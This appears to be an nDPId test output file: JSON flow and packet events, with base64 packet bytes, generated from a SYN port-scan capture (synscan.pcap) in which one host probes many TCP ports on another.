+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1561,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1551,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAse\/UAADIGmn2sEAAIQA2GNIzTHQvdU4MZAAAAAGACDAAPgQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1562,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAshW8AADkGigOsEAAIQA2GNIzTAVTdU4MZAAAAAGACCAAvOAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1563,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1553,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAs8AUAADIGJm2sEAAIQA2GNIzTB9LdU4MZAAAAAGACDAAkugAAAgQFtA=="} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":648,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1564,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1554,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsrEwAADAGbCasEAAIQA2GNIzTAojdU4MZAAAAAGACBAAyBAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":631,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1565,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1555,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAse4wAACkGo+asEAAIQA2GNIzTAnfdU4MZAAAAAGACCAAuFQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1033,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1566,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1556,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsuCkAACUGa0msEAAIQA2GNIzTBAndU4MZAAAAAGACCAAsgwAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6567,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1567,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1557,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsiJEAACgGl+GsEAAIQA2GNIzTGafdU4MZAAAAAGACBAAa5QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1568,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1558,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsheEAACgGmpGsEAAIQA2GNIzTCcTdU4MZAAAAAGACBAAqyAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060800,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1081,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1569,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1559,"flow_packet_id":1,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060800,"pkt":"ACYLMQczACWzv5HuCABFAAAsxa0AACsGV8WsEAAIQA2GNIzTBDndU4MZAAAAAGACEAAkUwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1570,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1560,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsPY4AADEG2eSsEAAIQA2GNIzTwAndU4MZAAAAAGACCABwggAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1571,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1561,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsL4wAADMG5easEAAIQA2GNIzTBdzdU4MZAAAAAGACEAAisAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":264,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1572,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1562,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs9AMAADIGIm+sEAAIQA2GNIzTAQjdU4MZAAAAAGACDAArhAAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1573,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1563,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsKpEAADgG5eGsEAAIQA2GNIzTCD\/dU4MZAAAAAGACBAAsTQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":49,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1574,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1564,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs4xAAADkGLGKsEAAIQA2GNIzTADHdU4MZAAAAAGACCAAwWwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1575,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1565,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsmJ8AACYGidOsEAAIQA2GNIzTD6LdU4MZAAAAAGACDAAc6gAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1076,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1576,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1566,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsMFwAADAG6BasEAAIQA2GNIzTBDTdU4MZAAAAAGACBAAwWAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1503,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1577,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1567,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsgoUAACoGm+2sEAAIQA2GNIzTBd\/dU4MZAAAAAGACDAAmrQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6001,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1578,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1568,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsxtwAADAGUZasEAAIQA2GNIzTF3HdU4MZAAAAAGACBAAdGwAAAgQFtA=="} 
+00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":32771,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1579,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1569,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs8kIAADQGIjCsEAAIQA2GNIzTgAPdU4MZAAAAAGACBAC0iAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":417,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1580,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1570,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsZjgAAC4GtDqsEAAIQA2GNIzTAaHdU4MZAAAAAGACDAAq6wAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8011,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1581,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1571,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsXNkAACsGwJmsEAAIQA2GNIzTH0vdU4MZAAAAAGACEAAJQQAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":9040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1582,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1572,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAs4KkAACwGO8msEAAIQA2GNIzTI1DdU4MZAAAAAGACBAARPAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5226,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1583,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1573,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsHMUAACYGBa6sEAAIQA2GNIzTFGrdU4MZAAAAAGACDAAYIgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060801,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060801,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":5666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1584,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1574,"flow_packet_id":1,"flow_last_seen":1278275060801,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060801,"pkt":"ACYLMQczACWzv5HuCABFAAAsfkQAADQGli6sEAAIQA2GNIzTFiLdU4MZAAAAAGACBAAeagAAAgQFtA=="} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060802,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275060802,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1947,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1585,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1575,"flow_packet_id":1,"flow_last_seen":1278275060802,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275060802,"pkt":"ACYLMQczACWzv5HuCABFAAAs0YwAADMGQ+asEAAIQA2GNIzTB5vdU4MZAAAAAGACEAAg8QAAAgQFtA=="} 